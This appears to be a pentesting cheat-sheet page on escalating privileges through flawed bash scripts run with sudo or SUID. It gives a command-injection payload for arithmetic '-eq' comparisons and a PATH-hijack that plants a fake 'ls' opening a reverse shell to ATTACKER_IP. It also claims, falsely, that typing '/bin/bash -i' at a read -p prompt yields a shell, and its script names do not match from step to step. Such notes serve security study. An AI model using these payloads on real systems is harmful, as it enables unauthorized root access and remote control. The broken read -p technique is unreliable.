Bash

Theory

Bash scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, bash scripts can be vulnerable to various security issues, which, if exploited, can lead to privilege escalation and unauthorized access.

Practice

Shell In Prompt

If a bash script executes read -p. We can input /bin/bash -i to get a shell as another user.

$ cat /usr/bin/vuln-script.sh

#!/bin/bash
read -p "What's you name: "

We can input /bin/bash -i to get a shell.

$ sudo /usr/bin/sudo-script.sh

What's you name: /bin/bash -i

Bash eq

If a bash script use the -eq comaparison, it's vulnerable to arbitrary command execution.

$ cat /usr/bin/vuln-script.sh

#!/bin/bash
read -rp "Enter guess: " num

if [[ $num -eq 42 ]]
then
  echo "Correct"
else
  echo "Wrong"
fi

To execute arbitrary command, answer this question as below. We have to Inject arbitrary command before the correct number (42).

sudo /bin/bash /opt/example.sh
Enter guess: a[$(/bin/bash -p >&2)]+42

#Or execute your own malicious script
sudo /bin/bash /opt/example.sh
Enter guess: a[$(/tmp/shell.elf)]+42

a[$(/tmp/shell.elf)] will allow us, by evaluating the content of the array, to execute our script

No Command Path Exploit

If a bash script executes another command without specifying the path. We can abuse it and get a privilege escalation.

$ cat /usr/bin/vuln-suid-script.sh

#!/bin/bash
ls /root/var/file

We can generate a malicious file in the /tmp folder named as the command called without full path

#Generate a payload
echo "bash -c '/bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" > /tmp/ls
chmod +x /tmp/ls

#Change Path env variable
export PATH=/tmp:$PATH

#Execute the suid script
/usr/bin/vuln-suid-script.sh

Last updated 1 year ago